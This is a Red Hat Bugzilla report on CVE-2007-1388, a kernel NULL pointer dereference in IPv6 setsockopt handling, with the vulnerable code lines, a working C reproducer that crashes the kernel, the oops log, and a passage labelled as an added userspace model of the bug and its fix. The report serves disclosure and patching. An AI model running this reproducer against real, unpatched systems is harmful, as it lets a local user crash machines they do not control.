
Bug 232255

Summary: CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
Product: Red Hat Enterprise Linux 5
Component: kernel
Version: 5.0
Hardware: All
OS: Linux
Status: CLOSED ERRATA
Severity: high
Priority: medium
Keywords: Security
Reporter: Marcel Holtmann <holtmann>
Assignee: Don Howard <dhoward>
QA Contact: Martin Jenner <mjenner>
CC: security-response-team
Whiteboard: impact=important,source=vendorsec,reported=20070309,public=20070308
Fixed In Version: RHSA-2007-0169
Doc Type: Bug Fix
Last Closed: 2007-04-30 16:37:48 UTC

Description Marcel Holtmann 2007-03-14 16:00:56 UTC
There is a NULL pointer dereference in the function do_ipv6_setsockopt in
net/ipv6/ipv6_sockglue.c.
Line 417: opt can be NULL and dereferenced:
		opt = ipv6_renew_options(sk, np->opt, optname,    // opt = NULL
					 (struct ipv6_opt_hdr __user *)optval,
					 optlen);
		if (IS_ERR(opt)) {
			retv = PTR_ERR(opt);
			break;
		}

		/* routing header option needs extra check */
		if (optname == IPV6_RTHDR && opt->srcrt) {        // Oops


These few lines reproduce the bug:

#include <netinet/in.h>
#include <sys/socket.h>   /* declares socket() and setsockopt() */

int main(int argc, char **argv) {
  int s, optval;

  /* fresh socket: np->opt is NULL, so there are no existing options */
  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  /* optlen 0 with no existing options makes ipv6_renew_options() return NULL,
     which IS_ERR() does not catch; the optval contents are never read */
  setsockopt(s, SOL_IPV6, IPV6_RTHDR, &optval, 0);

  return 0;
}


Kernel Oops here:

Mar  8 23:57:17 localhost kernel: BUG: unable to handle kernel NULL pointer dereference at virtual address 00000010
Mar  8 23:57:17 localhost kernel:  printing eip:
Mar  8 23:57:17 localhost kernel: f8ebb270
Mar  8 23:57:17 localhost kernel: *pde = 00000000
Mar  8 23:57:17 localhost kernel: Oops: 0000 [#1]
Mar  8 23:57:17 localhost kernel: Modules linked in: binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centrino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_core hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod ipv6 parport_pc lp parport 8139cp joydev tsdev usbhid pcmcia tifm_7xx1 tifm_core sdhci mmc_core 8139too mii snd_intel8x0 snd_ac97_codec snd_ac97_bus ipw2200 snd_pcm_oss snd_mixer_oss yenta_socket rsrc_nonstatic pcmcia_core snd_pcm ieee80211 ieee80211_crypt psmouse serio_raw evdev snd_timer shpchp pci_hotplug intel_agp agpgart snd soundcore snd_page_alloc rtc ext3 jbd ohci1394 ieee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal processor fan capability commoncap vesafb fbcon tileblit font bitblit softcursor
Mar  8 23:57:17 localhost kernel: CPU:    0
Mar  8 23:57:17 localhost kernel: EIP:    0060:[<f8ebb270>]    Tainted: P      VLI
Mar  8 23:57:17 localhost kernel: EFLAGS: 00010246   (2.6.17-11-386 #2)
Mar  8 23:57:17 localhost kernel: EIP is at ipv6_setsockopt+0xa90/0xc40 [ipv6]
Mar  8 23:57:17 localhost kernel: eax: 00000000   ebx: f0cfca40   ecx: 00000039   edx: 00000000
Mar  8 23:57:17 localhost kernel: esi: 00000000   edi: 00000000   ebp: 00000039   esp: f25a9da8
Mar  8 23:57:17 localhost kernel: ds: 007b   es: 007b   ss: 0068
Mar  8 23:57:17 localhost kernel: Process null_deref (pid: 5076, threadinfo=f25a8000 task=f24a7580)
Mar  8 23:57:17 localhost kernel: Stack: 00000000 00000000 c199ce00 f8c9a4ff 00000001 00000000 f0cfce58 ee42e9c0
Mar  8 23:57:17 localhost kernel:        c18e1e7c c0179c74 3b9aca00 c199ce00 c18e1de0 ee42e9c0 c18e1e7c 00000000
Mar  8 23:57:17 localhost kernel:        c199ce00 00000000 ee42e9c0 c18e1e7c 00000000 c013c78b 00001000 c0359330
Mar  8 23:57:17 localhost kernel: Call Trace:
Mar  8 23:57:17 localhost kernel:  <c0179c74> __mark_inode_dirty+0x34/0x170  <c013c78b> do_generic_mapping_read+0x42b/0x540
Mar  8 23:57:17 localhost kernel:  <c0154f74> cache_alloc_refill+0x314/0x4d0  <c01cc98c> vsnprintf+0x55c/0x640
Mar  8 23:57:17 localhost kernel:  <c016f0b7> d_alloc+0x27/0x190  <c016f059> d_instantiate+0x49/0x80
Mar  8 23:57:17 localhost kernel:  <f8eba7e0> ipv6_setsockopt+0x0/0xc40 [ipv6]  <c0289966> tcp_setsockopt+0x36/0x370
Mar  8 23:57:17 localhost kernel:  <c0259e83> sock_common_setsockopt+0x23/0x30  <c02587d5> sys_setsockopt+0x75/0xd0
Mar  8 23:57:17 localhost kernel:  <c0259a19> sys_socketcall+0x209/0x280  <c02c7a00> do_page_fault+0x0/0x6e0
Mar  8 23:57:17 localhost kernel:  <c0102dbb> sysenter_past_esp+0x54/0x79
Mar  8 23:57:17 localhost kernel: Code: 00 00 d0 54 2a c0 ff 0d 80 88 ee f8 83 3d 80 87 ee f8 02 0f 85 34 fc ff ff a1 08 89 ee f8 31 ff e8 56 ab 25 c7 e9 d5 f6 ff ff 90 <8b> 50 10 85 d2 0f 84 3e f9 ff ff 80 7a 02 00 90 75 13 0f b6 42
Mar  8 23:57:17 localhost kernel: EIP: [<f8ebb270>] ipv6_setsockopt+0xa90/0xc40 [ipv6] SS:ESP 0068:f25a9da8
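
The root cause above is a gap in the kernel's error-pointer idiom: IS_ERR() only recognises pointers that encode an errno in the top page of the address space, so a plain NULL returned by ipv6_renew_options() passes the IS_ERR() test and reaches opt->srcrt. The following is an added example, not code from the bug report or from any Red Hat or upstream kernel: a userspace C model that re-implements ERR_PTR/PTR_ERR/IS_ERR in the spirit of include/linux/err.h, stands in for ipv6_renew_options() with a hypothetical renew_options(), and puts the unpatched decision logic beside a hardened form that also checks for NULL. The names renew_options, set_ext_hdr_fixed, unpatched_would_oops and the txoptions/rt_hdr structs are assumptions of this model, and the extra routing-header validation is a stand-in for the kernel's own check; the hardened form is one correct fix, not necessarily the patch shipped in RHSA-2007-0169.

```c
/* Added example, not from the bug report or any kernel tree: a userspace model
 * of the error-pointer idiom behind CVE-2007-1388. */
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* In the spirit of include/linux/err.h: an errno is encoded in the top
 * MAX_ERRNO bytes of the address space. NULL is not in that range, so
 * IS_ERR(NULL) is 0; that gap is the whole bug. */
#define MAX_ERRNO 4095
static inline void *ERR_PTR(long err)            { return (void *)(intptr_t)err; }
static inline long  PTR_ERR(const void *p)       { return (long)(intptr_t)p; }
static inline int   IS_ERR(const void *p)        { return (uintptr_t)p >= (uintptr_t)-MAX_ERRNO; }
static inline int   IS_ERR_OR_NULL(const void *p) { return !p || IS_ERR(p); }

enum { OPT_HOPOPTS = 54, OPT_RTHDR = 57 };   /* Linux IPV6_HOPOPTS / IPV6_RTHDR values */

struct rt_hdr    { int type; int hdrlen; int segments_left; };
struct txoptions { struct rt_hdr *srcrt; };   /* only the field the bug touches */

/* Hypothetical stand-in for ipv6_renew_options(): ERR_PTR on bad input, NULL
 * when the resulting option set is empty (the report's reproducer: no existing
 * options and optlen 0), otherwise a freshly allocated set. */
static struct txoptions *renew_options(struct txoptions *old, int optname,
                                       struct rt_hdr *newhdr, int optlen)
{
    if (optlen < 0)
        return ERR_PTR(-EINVAL);
    /* the new set keeps what the old one had, except the header being replaced */
    struct rt_hdr *srcrt = old ? old->srcrt : NULL;
    if (optname == OPT_RTHDR)
        srcrt = optlen > 0 ? newhdr : NULL;
    if (srcrt == NULL)
        return NULL;                      /* empty set: nothing to allocate */
    struct txoptions *opt = calloc(1, sizeof *opt);
    if (!opt)
        return ERR_PTR(-ENOMEM);
    opt->srcrt = srcrt;
    return opt;
}

/* Decision logic of the unpatched code with the dereference replaced by a
 * report: returns 1 if `opt->srcrt` would be evaluated on a NULL opt. */
static int unpatched_would_oops(struct txoptions *opt, int optname)
{
    if (IS_ERR(opt))
        return 0;                         /* taken by the PTR_ERR branch */
    return optname == OPT_RTHDR && opt == NULL;
}

/* Hardened form: 0 on success or a negative errno. The routing-header check
 * runs only when there is an option set to look at; a NULL set is simply
 * "no options" and is stored as such. */
static int set_ext_hdr_fixed(struct txoptions **np_opt, int optname,
                             struct rt_hdr *newhdr, int optlen)
{
    struct txoptions *opt = renew_options(*np_opt, optname, newhdr, optlen);
    if (IS_ERR(opt))
        return (int)PTR_ERR(opt);
    /* routing header option needs extra check, and a NULL opt has none */
    if (optname == OPT_RTHDR && opt && opt->srcrt) {
        struct rt_hdr *r = opt->srcrt;    /* stand-in validation of a type-0 header */
        if (r->type != 0 || (r->hdrlen & 1) || (r->hdrlen >> 1) != r->segments_left) {
            free(opt);
            return -EINVAL;
        }
    }
    free(*np_opt);
    *np_opt = opt;                        /* may be NULL */
    return 0;
}

/* The report's reproducer in this model: fresh socket, IPV6_RTHDR, optlen 0.
 * Returns 1 because NULL slips past IS_ERR() in the unpatched logic. */
static int reproducer_unpatched(void)
{
    struct txoptions *opt = renew_options(NULL, OPT_RTHDR, NULL, 0);
    return unpatched_would_oops(opt, OPT_RTHDR);
}

int main(void)
{
    struct txoptions *np = NULL;
    printf("IS_ERR(NULL)=%d IS_ERR_OR_NULL(NULL)=%d\n", IS_ERR(NULL), IS_ERR_OR_NULL(NULL));
    printf("unpatched logic would oops on the reproducer: %d\n", reproducer_unpatched());
    printf("fixed logic on the reproducer: rc=%d, opt=%p\n",
           set_ext_hdr_fixed(&np, OPT_RTHDR, NULL, 0), (void *)np);
    return 0;
}
```

The point to take from the model is the review rule: a function that can return an error pointer, NULL, or a valid pointer needs both checks (or IS_ERR_OR_NULL()) before any field is read, and the reproducer's empty-option path is exactly the case that a test of "IS_ERR only" misses.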

Comment 3 Don Howard 2007-03-29 21:41:56 UTC
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.

Comment 5 Mike Gahagan 2007-04-26 22:13:28 UTC
Verified on an x86_64 system.


Comment 7 Red Hat Bugzilla 2007-04-30 16:37:48 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0169.html